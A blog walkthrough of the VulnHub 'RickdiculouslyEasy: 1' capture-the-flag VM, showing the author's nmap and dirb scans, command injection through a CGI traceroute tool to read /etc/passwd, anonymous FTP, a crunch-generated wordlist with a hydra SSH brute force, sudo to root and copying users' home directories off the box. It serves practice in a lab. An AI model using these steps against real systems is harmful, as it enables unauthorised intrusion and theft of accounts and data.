CTF Walkthrough: RickdiculouslyEasy: 1

Posted on By PaulPosted in CTF, Penetration Testing, Security, VulnHub

A walkthrough on the steps that I took to get through the “RickdiculouslyEasy: 1” B2R VM available here:

RickdiculouslyEasy: 1

I’m going to skip the steps of running the VM in VirtualBox and finding the IP address for the machine (10.13.37.235 on my end. Yours, of course, will vary). I assume if you’re here to polish your pen testing skills that VirtualBox is old hat for you.

Our goal for this CTF is to collect 130 points. We’ll keep track as we go through it.

First, the almighty nmap scan.

root@kali:~# nmap -sS 10.13.37.235 -p-

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-03 00:11 EDT
Nmap scan report for 10.13.37.235
Host is up (0.00073s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
13337/tcp open unknown
22222/tcp open easyengine
60000/tcp open unknown
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7037.58 seconds
root@kali:~#

Now that we have our port listing, we should first try ports 80 and 9090 in a web browser.

Nothing exciting on port 80 (or the source), let’s try 9090.

Lo-and-behold! There is a flag, right in your face… so to speak.

FLAG {There is no Zeus, in your face!}
FLAG {There is no Zeus, in your face!}

Running total: 10 points

Next, let’s see if there’s anything else we can check out in the browser before moving on. Run dirb on port 80:

root@kali:~# dirb http://10.13.37.235

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Nov 2 22:32:39 2017
URL_BASE: http://10.13.37.235/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.13.37.235/ ----
+ http://10.13.37.235/cgi-bin/ (CODE:403|SIZE:217)
+ http://10.13.37.235/index.html (CODE:200|SIZE:326)
==> DIRECTORY: http://10.13.37.235/passwords/
+ http://10.13.37.235/robots.txt (CODE:200|SIZE:126)

---- Entering directory: http://10.13.37.235/passwords/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Thu Nov 2 22:32:41 2017
DOWNLOADED: 4612 - FOUND: 3

Hmmm, a couple interesting finds. Let’s look at robots.txt first.

They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*

Oh Rick… Anyway, root_shell.cgi? Could it be that easy?

<html><head><title>Root Shell
</title></head>
--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->
</html>

Of course not. Let’s try tracertool.cgi:

Hey, we might be able to work with this! Let’s see if we can inject some cgi in here…

And off we go! Maybe we can read the /etc/passwd file for a listing of the users on the box, might come in handy elsewhere.

Awww, that’s a pretty cat… wait, don’t get distracted, they must’ve replaced the cat program to try to stop us! Maybe there’s another tool to show the contents of a file… I’m gonna go with “more”:

Aaaaand there we are. A couple users to take note of.

Let’s go back to what dirb told us earlier. There was also a “passwords” subdirectory, which seems… odd.

Ah, well okay then, let’s see what we have here…

FLAG{Yeah d- just don't do it.} - 10 Points

SCORE!!! 10 more points, running total, 20 points!

And for passwords.html?

<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>

It seems someone’s password might be “winter”. We’ll get to that in a little bit. In the meantime, let’s see what we can do with port 21.

Back to nmap, let’s run some ftp scripts:

root@kali:~# nmap --script=ftp* 10.13.37.235 -p 21

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-02 23:20 EDT
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Stats: 0:03:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 27.59% done; ETC: 23:32 (0:08:40 remaining)
Nmap scan report for 10.13.37.235
Host is up (0.00056s latency).

PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 3885 guesses in 602 seconds, average tps: 6.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.13.37.237
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 602.48 seconds

No valid accounts found, but anonymous logins are allowed, and there’s a FLAG.txt file! Let’s pull it down.

root@kali:~# ftp 10.13.37.235
Connected to 10.13.37.235.
220 (vsFTPd 3.0.3)
Name (10.13.37.235:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 42 Aug 22 05:10 FLAG.txt
drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
226 Transfer complete.
42 bytes received in 0.00 secs (14.3011 kB/s)
ftp> quit
221 Goodbye.
root@kali:~# cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
root@kali:~#

10 more points! 30 total so far… only 100 more to go… Let’s see what’s on the other ports, starting with 13337.

root@kali:~# nc 10.13.37.235 13337
FLAG:{TheyFoundMyBackDoorMorty}-10Points

10 more points! That one was easy… okay, so forty points now.

Let’s try port 22 now. We have some user names from the cgi hack and a password that Rick tried to hide. I’m gonna make a wild guess and try the user “Summer” with the password “winter”. Because why not.

root@kali:~# ssh Summer@10.13.37.235
ssh_exchange_identification: Connection closed by remote host

Uhhh, nope. Hmmm…

root@kali:~# nc 10.13.37.235 22
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)

Odd… isn’t this a Fedora box? Might end up having to come back to this. So can’t ssh into port 22. What about port 22222?

root@kali:~# nc 10.13.37.235 22222
SSH-2.0-OpenSSH_7.5

Protocol mismatch.
root@kali:~# ssh Summer@10.13.37.235 -p 22222
Summer@10.13.37.235's password:
Last login: Fri Nov 3 14:51:30 2017
[Summer@localhost ~]$

And we’re in!

[Summer@localhost ~]$ ls
FLAG.txt
[Summer@localhost ~]$ more FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
[Summer@localhost ~]$

10 more points! 50 points, almost halfway there!

Upon further inspection, we seem to have read access to the other home directories:

[Summer@localhost ~]$ ls -lR /home/
/home/:
total 0
drwxr-xr-x. 2 Morty Morty 131 Sep 15 11:49 Morty
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 RickSanchez
drwx------. 3 Summer Summer 111 Nov 3 15:17 Summer

/home/Morty:
total 48
-rw-r--r--. 1 root root 43145 Aug 22 03:04 Safe_Password.jpg
-rw-r--r--. 1 root root 414 Aug 22 03:06 journal.txt.zip

/home/RickSanchez:
total 0
drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21 09:50 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez 26 Aug 18 20:26 ThisDoesntContainAnyFlags

/home/RickSanchez/RICKS_SAFE:
total 12
-rwxr--r--. 1 RickSanchez RickSanchez 8704 Sep 21 10:24 safe

/home/RickSanchez/ThisDoesntContainAnyFlags:
total 4
-rw-rw-r--. 1 RickSanchez RickSanchez 95 Aug 18 20:26 NotAFlag.txt

/home/Summer:
total 4
-rw-rw-r--. 1 Summer Summer 48 Aug 22 02:46 FLAG.txt
[Summer@localhost ~]$

Whaddaya say we pull all that schtuff to kali to have a look at it?

[Summer@localhost ~]$ rsync -av /home/* root@10.13.37.237:~/RickCTF/
root@10.13.37.237's password:
sending incremental file list
Morty/
rsync: send_files failed to open "/home/Morty/.bash_history": Permission denied (13)
Morty/.bash_logout
Morty/.bash_profile
Morty/.bashrc
Morty/Safe_Password.jpg
Morty/journal.txt.zip
RickSanchez/
RickSanchez/.bash_logout
RickSanchez/.bash_profile
RickSanchez/.bashrc
RickSanchez/RICKS_SAFE/
RickSanchez/RICKS_SAFE/safe
RickSanchez/ThisDoesntContainAnyFlags/
RickSanchez/ThisDoesntContainAnyFlags/NotAFlag.txt
Summer/
Summer/.bash_history
Summer/.bash_logout
Summer/.bash_profile
Summer/.bashrc
Summer/.lesshst
Summer/FLAG.txt
Summer/.ssh/
Summer/.ssh/known_hosts

sent 55,468 bytes received 382 bytes 22,340.00 bytes/sec
total size is 53,940 speedup is 0.97
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1178) [sender=3.1.2]
[Summer@localhost ~]$

Well, we know what’s in Summer’s FLAG.txt, so skip that one, let’s look at the other files. Her dotfiles are unremarkable, so let’s check out Morty’s files.

His dotfiles are also nothing, which I assumed, but it never hurts to check.

The picture is nothing special, unless we open it up in a hex editor, I’ll use “hexcurse”.

root@kali:/tmp# hexcurse /tmp/Safe_Password.jpg

I’m not gonna put the whole thing here, but there it is! Er… there something is at least…

The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek

So let’s open the zip file. Sure enough, password protected, but something tells me it’s “Meeseek”.

Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points

20 Points! That’s what, 70 points? Moving along now…

Okay, on to Rick’s home folder. The folder called “ThisDoesntContainAnyFlags” actually doesn’t contain any flags, and “RICKS_SAFE” contains an executable. Not entirely sure I want to run this on my machine (I know, it’s probably nothing in this case, but still…). So I’m going to go back to my “Summer” shell and run it there. Can’t run it in Rick’s directory, so I’ll copy it to /home/Summer and run it there.

[Summer@localhost ~]$ cp /home/RickSanchez/RICKS_SAFE/safe ~/
[Summer@localhost ~]$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
[Summer@localhost ~]$

Hmmm, the safe needs arguments. Entering random stuff throws gibberish, but didn’t the last flag say a bunch of stuff about a safe and a password? Let’s try the flag.

[Summer@localhost ~]$ ./safe 131333
decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.
[Summer@localhost ~]$

Nice, okay, another flag and some instructions. (90 points!)

So password will be 1 uppercase, 1 digit, and a word from Rick’s old band, “The Flesh Curtains”. (I had to Google for that…)

Okay, so let’s generate a list of potential passwords for Rick’s account with crunch. (FYI, Summer can’t use sudo, but I assumed you assumed that already)

root@kali:~# crunch 7 7 -t ,%Flesh -o /tmp/flesh-pwds.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260

crunch: 100% completed generating output
root@kali:~# crunch 10 10 -t ,%Curtains -o /tmp/curtains-pwds.txt
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260

crunch: 100% completed generating output
root@kali:~# cat /tmp/flesh-pwds.txt /tmp/curtains-pwds.txt > /tmp/rickspasswordishere.txt
root@kali:~#

Now we use hydra and our generated password list to crack his ssh account.

root@kali:~# hydra -l RickSanchez -P /tmp/rickspasswordishere.txt ssh://10.13.37.235:22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-03 00:52:26
[DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task
[DATA] attacking ssh://10.13.37.235:22222/
[STATUS] 259.00 tries/min, 259 tries in 00:01h, 264 to do in 00:02h, 16 active
[22222][ssh] host: 10.13.37.235 login: RickSanchez password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-11-03 00:54:21
root@kali:~#

Boom. Let’s do this…

root@kali:~# ssh RickSanchez@10.13.37.235 -p 22222
RickSanchez@10.13.37.235's password:
Last failed login: Fri Nov 3 15:54:21 AEDT 2017 from 10.13.37.237 on ssh:notty
There were 587 failed login attempts since the last successful login.
Last login: Thu Sep 21 09:45:24 2017
[RickSanchez@localhost ~]$ sudo su -
[sudo] password for RickSanchez:
[root@localhost ~]# ls -l
total 8
-rw-------. 1 root root 1214 Aug 18 18:16 anaconda-ks.cfg
-rw-r--r--. 1 root root 40 Aug 22 07:37 FLAG.txt
[root@localhost ~]# more FLAG.txt
FLAG: {Ionic Defibrillator} - 30 points
[root@localhost ~]#

120 points! Only 10 more hidden somewhere… let’s see.

Oh yeah, still haven’t tried port 60000.

root@kali:~# nc 10.13.37.235 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
#

And we’re done! 130 points! I’m going to bed now, that was a long one…